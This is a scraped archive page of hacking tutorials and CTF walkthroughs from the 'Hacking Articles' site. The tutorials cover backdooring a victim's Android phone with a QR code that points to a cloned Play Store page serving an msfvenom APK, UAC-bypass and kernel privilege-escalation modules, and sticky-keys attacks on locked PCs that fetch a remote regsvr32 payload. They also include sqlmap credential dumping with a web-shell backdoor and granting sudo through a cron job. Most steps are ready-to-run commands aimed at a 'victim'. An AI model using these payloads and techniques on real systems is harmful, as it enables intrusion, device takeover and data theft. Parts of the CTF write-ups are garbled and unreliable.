Kali Linux Archives - Hacking Articles

QR Code is a 2 dimensional barcode which can be scanned using Smartphone’s or dedicated QR Readers. These QR Codes are directly linked to contact numbers, websites, usernames, photos, SMS, E-mails and even encryptions but they do not end here. QR Codes are big deal in Japan and it’s just a matter of time when take over whole world as there is growth in SEO.

Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.

Our step is to create a pernicious file using msfvenom.

Msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk

Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select 2^nd option which indicates Website Attack Vectors?

Then further select 8^th option which refers to HTA Attack Method.

And then select Site Cloner by typing 2.

When you type the said 2 option, it will ask you enter the URL that you want to clone. Here give the URL of play store: https://play.google.com/store

Then when it asks you to select meterpreter option type 3 as we want to select reverse_tcp.

Furthermore, save the launcher.apk file that you created using msfvenom to /var/www/html/

Also the change the name of launcher.hta to lancher.apk that your SET had just created as shown below

Now add The QR Code Extension to your chrome.

The QR Code Extension wills generate a QR Code for you according to your attack.

Now start multi/handler so you have your session in time and for this type:

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.100

set lport 6666

run

Now you can move ahead and make the victim scan your code. And install the app.

And Voila!! As soon as scanning of the code will be completed, you will have your meterpreter session.

Author: Shivam Gupta is An Ethical Hacker, Cyber Security Expert, Penetration Tester, India. you can contact here

The post Hack Android Phone using HTA Attack with QR Code appeared first on Hacking Articles.

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open kali Linux terminal type msfconsole

Use payload for windows and start multi/handler for reverse connection. Once you hacked the victim pc now go for privilege escalation using following techniques

Windows Escalate UAC Protection Bypass

Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

Give a look at image when you will use getuid command it ask for user ID that is username: pc 10; after using getsystem now username is system. Again use getuid command now you are having admin access.

Windows Escalate UAC Protection Bypass (In Memory Injection)

Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call Exit Process () after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection

msf exploit(bypassuac_injection) > set session 1

msf exploit(bypassuac_injection) > exploit

Use getsystem command and then go for user ID by typing getuid command in meterpreter.

Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

msf > use windows/local/bypassuac_vbs

msf exploit(bypassuac_vbs) > set session 1

msf exploit(bypassuac_vbs) > exploit

use getsystem command and then go for user ID by typing getuid command in meterpreter.

Windows Escalate UAC Execute RunAs

Available targets: Windows x32 and Windows x64 bit

This module will attempt to elevate execution level using the Shell Execute undocumented Run As flag to bypass low UAC settings. Ask always uses a self-generated payload which is easily detected by AV. Click yes to allow the payload to create another reverse shell with elevated privileges.

msf > use windows/local/ask

msf exploit(ask) > set session 1

msf exploit(ask) > exploit

Use getsystem command and then go for user ID by typing getuid command in meterpreter.

MS16-032 Secondary Logon Handle Privilege Escalation

Available targets: Windows x32 and Windows x64 bit

This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

msf > use windows/local/ms16_032_secondary_logon_handle_privesc

msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1

msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

Use getsystem command and then go for user ID by typing getuid command in meterpreter.

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Available targets: Windows x32 bit

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

msf exploit(ms16_016_webdav) >set session 1

msf exploit(ms16_016_webdav) > exploit

Use getsystem command in meterpreter for admin access of pc.

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

Available targets: Windows 732 bit

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shell code nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome’s sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.

msf exploit(ms13_053_schlamperei) >set session 1

msf exploit(ms13_053_schlamperei) >exploit

Use getsystem command and then go for user ID by typing getuid command in meterpreter

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post 7 Ways to Get Admin Access of Remote Windows PC (Bypass Privilege Escalation) appeared first on Hacking Articles.

SkyDog is the second VM in CTF Root2Boot series created by James Brower. It is configured with DHCP so the IP will be given to it automatically. This VM is based on Catch me if you can which is movie about Frank who is conman. So it is correct to assume that a broad OSINT concept will be used in it. This is an amazing VM as it uses about hacking and forensic skills. The author of this VM has given us hints about all the eight flags as below :

Flag #1 : Don’t go Home Frank! There’s a Hex on Your House.

Flag #2 : Obscurity or Security?

Flag #3 : Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.

Flag #4 : A Good Agent is Hard to Find.

Flag #5 : The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

Flag #6 : Where in the World is Frank?

Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!

Flag #8 : Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Except this we know that the flags are in MD5 Hash. You can download it from : https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/.

WalkThrough

Let us find our target first.

netdiscover

Now that we know our target is 192.168.1.27. Let’s fire up nmap scan.

nmap –p- -A 192.168.1.27

Nmap shows that four ports are opened which are : 22, 80, 443, 22222 with the services of SSH(closed), HTTP, HTTPS, SSH(open).

The port 80 is opened as well as 443 so let’s open our target in browser and see what we can find there.

There was nothing on the webpage except the information on the lab so I visited it page source.

In the page source there was a directy /oldie/html5.js. I opened it and found the page very confusing but then I looked at the first flag’s hint i.e. Flag #1 : Don’t go Home Frank! There’s a Hex on Your House. And then it clicked me in the hint says something about hex and so the first line is our first flag but in hex.

So I copied it and paste it to the asciitohex.com. And it will decode the hex and you will have the first flag in MD5 hash value.

Use the online webpage to crack the MD5 code like we have done in the following image :

Our first flag is nmap as we already know that this is hint for next flag that means our next flag is related to nmap. So I looked closely to all ports and then I decided to open SSH which was opened on 22222 port.

And yes! We have found our second flag. Let’s crack it with hash value.

Our second flag is encrypt that means our third flag is related to encryption. Let’s check the hint given for the third flag. Flag #3 : Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic. Now in the hint it says something intercepting the traffic. Now intercepting the traffic is related to SLL certificate. To check the certificate click on the logo of Secure Connection. And then click on the arrow for the next menu.

From the drop down menu then appears select More Information tab.

It will open a dialogue box just like on as shown below :

From this dialogue box, select security tab and then click on View Certificate button. In the certificate you will find the third flag.

Again crack it through MD5 cracker.

So our third flag seems to be personnel. This personnel could be a directory so open it in the browser.

When we open the personnel directory, it says that access is denied. That means there is a log in portal somewhere here to which our access is denied. So I went back to the previous directory that we had found and explored a bit there and I found there that the FBI workstations work on MIE 4.0. that means there was a problem of browser.

Now I could not find any User Agent which had an MIE 4.0 so I decided to use BurpSuite. I captured it cookies.

In the cookies you can see that the browser used is Linux x86_64. I changed to MSIE 4.0 as shown below :

And then when I forwarded through BurpSuite, thus, the page opened in the browser giving us our Fourth flag.

Now decode this flag’s value and add ‘new’ to it.

Upon cracking our flag is evidence, and by adding new to it our forth flag becomes – new evidence. Now this again could be a directly like the previous flags. Open it in browser.

And yes!! We have log in portal. Here, for the username and the password I figured OSINT must have been used. So I gathered every information about the movie I could and I even watched the movie. For the whole two days I searched and searched But alas! I found nothing. And then I referred to the author’s walkthrough and got the username and password that is carl.hanratty and Grace respectively.

Now upon log in the newevidence directory opens.

There was nothing on the page so looked on to the page source.

In the page source we found three directories from which invoice.pdf proved to be useless. LOL! But not to worry we have other two directories. Lets open Evidence.txt.

And yes! We have found our fifth flag. Upon cracking the MD5 value, the flag is panam. Five flags down, four to go.

Now let’s have a look on the other directory that we had found.

Save this image. I tried to read this image through exiftool but it did not work. So I tried steghide.

steghide extract –sf image.jpg

We have got our sixth flag now which is ILoveFrance. You can decode this flag’s MD5 value but it will still give ILoveFrance. And we also have a clue i.e. iheartbrenda. This flag and clue are both important, make its note.

For our seventh flag we have the hint — Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive! In this hint it says “I am the fastest man alive” this is the pet dialogue of The Flash. And even in the movie Frank uses a fake name Barry Allen.

This can be our username. Lets log in through SSH port using bary allen username. When it asked for password I tried both ILoveFrance and iheartbrenda and fortunately iheartbrenda was the correct password.

To have root’s access we used web_delivery exploit. We made that exploit using python script. To do so open metasploit by typing msfconsole in thr terminal of kali and then further type :

use exploit/multi/script/web_delivery

set target 0

set payload python/mertrepreter/reverse_tcp

set lhost 192.168.1.21

set lport 4444

exploit

It will create a code. Copy that code and paste it on the terminal.

As soon as you will hit enter, a mterpreter session will open and then type:

session –I 1

pwd

It will show a flag.txt but it will not be considered as our last flag as this is not in the form of MD5 hash as it was instructed by the created.

I explored here a lot and then I download security-system.data.zip as I had a instinct that this could be useful. This was a RAM file. I read it using volatility software. For this type :

volatility-2.3.1.standalone.exe –f security-system.data.zip imageinfo

volatility-2.3.1.standalone.exe –f security-system.data.zip –profile=WinXPSP2x86 consoles

And we have captured our last flag. HURRAAYYYYY!!!!!! All the flags have been captured. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the SkyDog Con CTF 2016 – Catch Me If You Can VM appeared first on Hacking Articles.

When you exploit the victim pc there would be certain limits which resist performing some action even after you are having the shell of victim’s pc. To get complete access of your victim pc; you need to bypass privilege escalation where a user receives privileges they are not authorize to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. Metasploit has various other post exploits that will use a number of different techniques to attempt to gain system level privileges on the remote system. But apart from it there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save your much time.

Use payload for Linux and start multi/handler for reverse connection. Once you hacked the victim pc now go for privilege escalation using following scripts.

LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum:

Privileged access: Diagnose if the current user has sudo access without a password; whether the root’s home directory accessible.

System Information: Hostname, Networking details, Current IP and etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd

Kernel and distribution release details.

Git clone https://github.com/rebootuser/LinEnum.git

Once you download this script from there you can simply run it by tying ./LinEnum.sh on terminal. Hence it will dump all fetched data and system details.

./LinEnum.sh

Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a python implementation to suggest exploits particular to the system that’s been taken under. To download the script click on the link http://www.securitysift.com/download/linuxprivchecker.py

Now to use this script just type python linuxprivchecke.py on terminal and this will enumerate file and directory permissions/contents. This script works same as LinEnum and hunts details related to system network and user.

python linuxprivchecker.py

Linux Exploit Suggester

It is based on operating system release number. This program will perform a ‘uname -r’ to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Additionally possible to provide ‘-k’ flag to manually enter the Kernel Version. It is a Perl script that does not exactly same as above. Type following to download this script:

git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git

If you are aware from the kernel version then directly execute the script by typing following on terminal:

./Linux_Exploit_Suggester.pl -k 3.5

If not then type ./Linux_Exploit_Suggester.pl uname –r to know the version of your kernel and go for above command and replace my kernel version from yours. Hence it suggests the possible exploit for privilege escalation.

Unix-Privesc-checker

Shell script to check privilege escalation vectors on UNIX systems. Unix-privesc-checker is a script that runs on UNIX systems and Linux system. It seek to find misconfigurations that could allow a not authorize users to escalate privileges to other users or to access local apps.

It is written as a single shell script so it can be easily uploaded and execute. It can be execute either as a normal user or as root. When it finds a group-writable file or directory it only flags an issue if that group has more than one non-root member.

To download this script type following on terminal

Git clone https://github.com/pentestmonkey/unix-privesc-check.git

Unzip the folder and execute the script by typing following

unix-privesc-check standard

So you can also check the way I am using these script from given images which could help you in a better way. And similarly use another command for same purpose.

unix-privesc-check detailed

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post 4 Ways to get Linux Privilege Escalation appeared first on Hacking Articles.

This is another article for Boot2Root series in CTF challenges. This lab is prepared by HollyGracefull. This is just a preview of the original lab which stimulates the Ecommerce web application which contains common security errors. Current vulnerabilities are listed below :

SQL Injection (Error-based)
SQL Injection (Blind)
Reflected Cross-Site Scripting
Stored Cross-Site Scripting
Insecure Direct-Object Reference
Username Enumeration
Path Traversal
Exposed phpinfo()
Exposed Administrative Interface
Weak Admin Credentials

WalkThrough

Firstly, let’s locate our target.

Our target is 192.168.1.8. Let’s scan it with nmap.

nmap –p- -A 192.168.1.8

The only port we found open was 80. Next we fire up the nikto.

nikto –h 192.168.1.8

Through nikto we discovered two directories : /admin/ and /images/. OK! We made its mental note and decided to move forward with opening our target in browser.

Opening it on the browser we found that it was ecommerce site as hinted by the author. We checked every tab but found nothing except in the blog tab.

In the blog tab, when you will hover your mouse arrow over the admin in the phrase ‘Hey Admin!’. It will change from arrow to a hand that indicates that means it will open as it a click on.

When you click on it, it will show a username of admin. Ok! I made a note of it. Let’s now check clothing tab.

There is nothing useful in this tab. As the author hinted that website is vulnerable towards SQL attacks so let’s try one. This time let’s try a different SQL attack using BurpSuite. Capture the cookies of the webpage through BurpSuite.

Copy the cooky string and paste it in a simple text file.

Then start the SQL attack by typing the following command in the terminal of Kali.

sqlmap –r /root/Desktop/sea.txt –dbs

Here,

/root/Desktop/sea.txt is the path of the text file in which we had saved t he cookies.

This command will give us the name of following database.

Out of these databases we will dump the tables of seattle with the following command :

sqlmap –r /root/Desktop/sea.txt –D seattle –tables

And with that we will have all the name of the tables as you can see in the following image.

Next we will dump the columns of the tables with the following command :

sqlmap –r /root/Desktop/sea.txt –D seattle –T tblMembers –columns

The execution of the above command will show the table names as following :

Now in the table names there is a table password. Now we already have the username of the admin and we just want the password. So now we will dump the contents of password table.

sqlmap –r /root/Desktop/sea.txt –D seattle –T tblmembers –C password –dump

And voila! We have the password i.e. Assasin1

Now in the browser, go to my account tab and there you will find a login portal. Give the username and password of the admin and click on Login.

And you will be logged in as the admin.

This CTF does contain any flag. All that required was to have admin access and yooohoooo!! We have that.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Seattle VM (CTF Challenge) appeared first on Hacking Articles.

Today in our CTF challenges we are going to do Billy Madison. This VM is based on 90’s movie Billy Madison, hence the name of the VM. The main aim of this VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy’s 12th grade final project. You will probably need to root the VM to complete this objective. Without further ado let’s start.

Download the lab from: https://www.vulnhub.com/entry/billy-madison-11,161/

WalkThrough

Let’s locate our target first.

netdiscover

Our target is 192.168.1.103. Scan it with nmap.

nmap –p- -A 192.168.1.103

Okay! So from nmap we have discovered the port : 22, 23, 69, 80, 137, 138, 139, 445, 2525. So, I opened our target in the browser at port 69.

A WordPress website opens. I explored this lot and tried to exploit it but it was useless. So I simply opened our target in the browser at its by-default port i.e. 80. The following page opens.

Then I explored smb port.

smbclient –L 192.168.0.103

When it asks for password then just hit enter without entering a password.

It just told us that backdoor are currently closed. So then I traversed telnet.

telnet 192.168.0.103

There was a message in telnet telling us the password and that it has been encrypted with ROT13(hint: ROTten). Let’s decode it.

By decrypting it, it comes to be as exschmenuating. Now this could be a directory so I opened it in the browser

Now in the browser it opened a webpage which gave us few hints for moving forward. Through conclusion we now know that there is .cap file. And that it is saved with the name which includes ‘veronica’ and that name and be derived from rockyou.txt.

Now there are many names in rockyou.txt but we only need the ones with have veronica in it and for that use the following command:

grep –I veronica /usr/share/wordslists/rockyou.txt > /root/Desktop/dict.txt

Execution of the above command will create a text file with names veronica in it. Now use this text file and find the file which had veronica in it through DirBuster. And for this, open DirBuster and give the URL in the Target URL text box and then give the path of the text file you just created using grep command. Give the directory name in Dir to start with text box and then give cap as the file extension.

As a result it will show you 012987veronica.cap file.

Open it in the browser. It will ask you to download it, go ahead with it.

Now check the TCP stream of every packet. In of it you will find an email sent from Eric to Veronica, telling her to download a certain antivirus.

In another TCP stream you will find that Veronica has replied to Eric, saying that to share the link through FTP server along with a youtube link.

Again in a TCP stream of a packet you will find that Eric has told her about his username and password.

Ok! So we have eric’s username and password. Keep that with you for later use. Meanwhile, let’s check out the youtube link.

In the video it says the combination of some numbers. Now these numbers could be used for port knocking. So, let’s try it.

For x in 1466 67 1468 1514 1981 1986; do nmap –Pn –host_timeout 201 –max-retries 0 –p $x 192.168.0.103; done.

Then to check I fired up the nmap again.

nmap –p- 192.168.0.103

And Voila!! FTP port opened on 21. Lets’ enter through it now as we have username and password. Remember The password and username for eric we discovered earlier.

ftp 192.168.0.103

Now let’s see the directories in it.

dir

There is a file named .notes. I decided to read it but before doing so I had to download it, therefore, type :

get .notes

exit

Now that notes file is downloaded, type the following command in the terminal of kali to read it:

cat .notes

There was a message in the notes by eric. Now if you remember the conversation of veronica and eric then you would know that there are two users on ftp server. second one is veronica. Naturally I decided to use hydra to apply the brute force attack on FTP to get the username and password using the same dictionary file which I had created with grep.

hydra –l veronica –p /root/Desktop/ver.txt ftp://192.168.0.103

And yes!! We have the password along with username i.e. veronica and babygirl_veronica07@yahoo.com respectively. Then I decided to explore more of FTP with veronica’s username and password and I found two files there: one is of .cap and other .eml and downloaded then both and to achieve so type the combination of the following commands:

ftp 192.168.0.103

dir

binary

get eg-01.cap

get email-from-billy.eml

Let’s read the email now.

In the mail he says how he hacks Eric’s wireless password. But if you observe everything you will find that he has used swaks to send this mail. Now swaks is a SMTP server that is a featureful, flexible, scriptable, transaction-oriented tool developed by John Jetmore. So, therefore I used the following command next:

swaks –to eric@madisonhotels.com –from vvaughn@polyfector.edu –server 192.168.0.104:2525 – body “My kid will be a soccer player” –header “Subject: My kid will be soccer player”

Further I used aircrack-ng to monitor eg-01.cap to because the email that was sent through the swaks mentioned something about wifi password.

aircrack-ng /root/Desktop/eg-01.cap –w /usr/share/wordlists/rockyou.txt

And with aircrack-ng we found the password of wireless i.e. triscuit*.

Now if you again scan it with nmap.

nmap –p- -A 192.168.0.103

As a result you can see that a new port opens i.e. 1974 with SSH service. Let’s try and log in with SSH.

ssh eric@192.168.0.103 –p 1974

And then give the password triscuit*. Once I was logged in I checked it linux’s version with the following command but it was not exploitable.

lsb_release –a

Then typed following command to see what it has to offer :

There I found a text file so I decided to read it.

cat why-1974.txt

Then type the following command:

find / -perm -2000 –types f 2>/dev/null

I was pretty lost here so decided to take some help from Mr. Goblin (https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/) and so type the following set of commands:

touch /tmp/test

/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test

echo –e ‘#!/bin/bash\ne

cho “eric ALL=(ALL) NOPASSWORD:ALL” >> /etc/sudoers’ > /etc/cron.hourly/test

chmod +x /etc/cron.hourly/test

cat /etc/chron.hourly/test

This way you will escalate the privileges and reach root. Lets see what files root has:

I decided to read /PRIVATE file.

cd /PRIVATE

Here, I found a hint.txt and BowelMovement files. First I opened hint.txt.

cat hint.txt

In this file he is talking about the BowelMovement file and about its password which is the link given. So I copied the BowelMovement file.

cp BowelMovement /var/www/html

And then I created a dictionary file using cewl and that link.

cewl –depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt

By brute forcing you will find the correct password from this dictionary file. Using that password open theovement file that you have downloaded. BowelM.

And then open the same in the terminal of kali and type :

There is a file called secret.zip, unzip it.

unzip secret.zip

In the zipped folder there were two files. I decided to read them both.

cat THE-END.txt

cat Billy_Madison12th_Grade_Fimal_Project.doc

Finally! We have solved the CTF. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Billy Madison VM (CTF Challenge) appeared first on Hacking Articles.

Today we will discover how to take Meterpreter session of a pc in a network which is switched on but is locked.

Let us assume that our victim’s pc already has sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys.

You will need physical access to the victim’s pc for this attack. Press the “shift” key 5 times on the victim’s pc to bring up the command prompt.

Next, we run metasploit on our own pc. $msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Take down the command generated by metasploit and run it on the victim pc’s command prompt

Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll

Voila, we have the session of victim’s pc on our meterpreter.

Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. contact here.

The post Hack Locked PC in Network using Metasploit appeared first on Hacking Articles.

Lets learn how to take Meterpreter session of a pc in a network which is switched on but is locked and has remote desktop feature enabled on it.

Let us assume that our victim’s pc already has utilman attack or sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys .

You donot need physical access to the victim’s pc for this attack.

First, run metasploit on your pc.

$msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Open another terminal to take the remote desktop session of the victim’s pc and enter the victim’s ip.

$rdesktop 192.168.0.103

You get the remote desktop of the victim’s pc.

Press the “shift” key 5 times to bring up the command prompt.

And returning to our previous terminal with meterpreter, we have finally got the session of victim’s pc on out terminal.

Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled) appeared first on Hacking Articles.

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

www.owasp.org/index.php/SQL_Injection

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box. Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.

Turn on burp suite in kali Linux click on proxy in menu bar and go for intercept is on button. Come to back and click on submit button in browser. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Copy the complete detail of intercept; past on leafpad; save on desktop as 1.

Open terminal and type following command for SQL injection attack using Sqlmap.

sqlmap -r /root/Desktop/1 –dbs -D dvwa –dump all –os-shell

sqlmap is an open source penetration testing tool that self-regulates the process of detecting and exploiting SQL injection vulnerabilities and taking over of database servers. -r is used for recursions which will analysis your intercepted data from path/root/Desktop/1.

Things that to be notice is I have used –dbs in above command which fetched all database names as you can see in below image. Then it will ask to store hashes in temporary file type y and hit enter.

Now next it extracts table: user for database DVWA which I have mentioned in above command as –D dvwa.

Grateful we have penetrated the user table successfully. Please have a look over fetched data you will find that it dumps login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Now this tool is going to use a web backdoor for command prompt where it will ask to choose language for backdoor

Type 4 and hit enter.

Afterwards it will ask to choose any options for location for writable directory.

Type 1 and hit enter.

You can see the backdoor has been successfully uploaded on destination folder. Type y for retrieved the command standard output. Now I am inside the os-shell which I have mentioned in above command as os-shell.

Os-shell> net users

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level Medium

From the list of vulnerability select SQL Injection for your attack. Select user ID: 2 from list. Set proxy turn on intercept tab in burp suite and come back to web browser for submit.

Follow the same process save the selected detail fetched by intercept on the desktop as file: 2.

Now security level is increased so I was unable to get os-shell but successful received all detail of database by typing following command on terminal.

sqlmap -r /root/Desktop/2 –dbs -D dvwa –dump all

Again I have got all database names including dvwa. Now again type y for further process.

Table: user for database DVWA It has dumped again same login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

This is very similar to the low level, however this time the attacker is inputting the value in a different manner. The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.

Here you find different scenario when you will select SQL Injection don’t get panic follow the step carefully this level is as similar as low level security. For hint the developer told that he had redirect the submit user ID to another page through POST action.

Click on link here to change your ID which will redirect to new window type ID: 1 turn on intercept then comes back and clicks on submit.

Now compare the intercepted data of both levels high and low you will find that POST action is use in high security as well as GET action is used in low security level. Copy the complete data and make following change in it. For help please look at below images.

Past the copied data to a leafpad replace POST from GET and add /?id=1&Submit=Submit save your file:third on desktop.

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Here go with flow!!!

Same process as above and this time again I will try for os-shell.

sqlmap -r /root/Desktop/1 –dbs -D dvwa –dump all –os-shell

Again I have got all database names including dvwa. Now again type y for further process.

Table: user for database DVWA It has dumped again same login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Oops!! Fail to get os-shell but we have retrieve database of dvwa under high security.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post SQL Injection Exploitation in DVWA (Bypass All Security) appeared first on Hacking Articles.

The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition. There are 11 flags to collect on your way to solving the challenge. The end goal is simple…. Destroy the Necromancer!

You can download necromancer from here let’s get going. Firstly, we run netdiscover

Netdiscover

Our next step is nmap.

nmap -A -p- 192.168.0.110

The scan takes a bit time and gives us nothing. So, let’s try a UDP scan using nmap.

nmap -sU -T4 -p- 192.168.0.110

We get a UDP port 666 open. Lets try netcat on it.

nc -nvu 192.168.0.110 666

No matter how many times we hit enter, we get the same reply- “You gasp for air! Time is running out!”

When we tried running the machine (necromancer), we had a message regarding the IP – “Renewal in 3600 seconds”. This seems to be related to the message on our terminal.

Let’s quickly run tcpdump.

tcpdump host 192.168.0.110

We get to know about some gateway 4444. This can be another port on our target. Lets use netcat once again.

nc -nvlp 4444

And we get a text dump in return. It has capital characters, small characters and numbers as well. This has to be a base64 encoded text. We decode it at www.asciitohex.com and get some sensible text.

Ok. We have our 1st flag. And a message to chant the flag’s string at UDP port 666. The flag1 text seems to be a md5 hash so we decrypt it at www.hashkiller.co.uk . It decrypts to “opensesame”. Let’s return to our port 666 using netcat and type in this string there.

nc -nvu 192.168.0.110

opensesame

Another hint. Numeral 80 reminds us ofport 80 used for http. Let’s fire up the victim machine’s IP to our browser on port 80.

Nothing useful except an image. Let’s download it and try to analyse it using binwalk

binwalk /root/Desktop/pileoffeathers.jpg

So we discover that the image is actually a zip archive. Let’s rename it.

mv /root/Desktop/pileoffeathers.jpg /root/Desktop/pileoffeathers.zip

Upon unzipping the file we get a txt file named feathers.txt which again contains a base64 text. We it and get our 3rd flag along with a clue /amagicbridgeappearsatthechasm. Seems like a directory decode.

Opening the directory in our browser, we are greeted by another web-page with seriously no clues this time. It only tells us that we need a magical item that could protect us from the necromancer’s spell. We google for “magic items wiki” and find some good stuff on the very first link. But what next?

We decide to make a custom dictionary with all the words on this wiki page. We will use cewl for this.

cewlhttps://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v

This makes a dictionary of magical items on our desktop. Let us try dirb to get our next clue.

dirb http://192.168.0.110/amagicbridgeappearsatthechasm -w /root/Desktop/magicitems.txt

We get another directory as” result. “talisman.

When we visit the url now using talisman, we are asked to download a binary file named talisman.

We download the file and change the permissions of talisman by running

chmod 777 /root/Desktop/talisman

Thereafter we run the file by going to its location.

./talisman

No matter what we answer to the asked question –“Do you want to wear the talisman?”, the result is the same –“Nothing happens”. So lets try to debug the binary file.

gdb /root/Desktop/talisman

Get some info about the functions-

info functions

Create a break point at wearTalisman because after all we want to wear the talisman.

break wearTalisman

run

And then jump to chantToBreakSpell

jump chantToBreakSpell

Yess. We succeeded in wearing the talisman. We get our 4th flag and a hint to chant the flag’s words at UDP port 31337.

Now the words appear to be in md5 hash and upon decrypting it we get – “blackmagic” We now use netcat to connect to port 31337 and type in “blackmagic” there.

nc -unv 192.168.0.110 31337

blackmagic

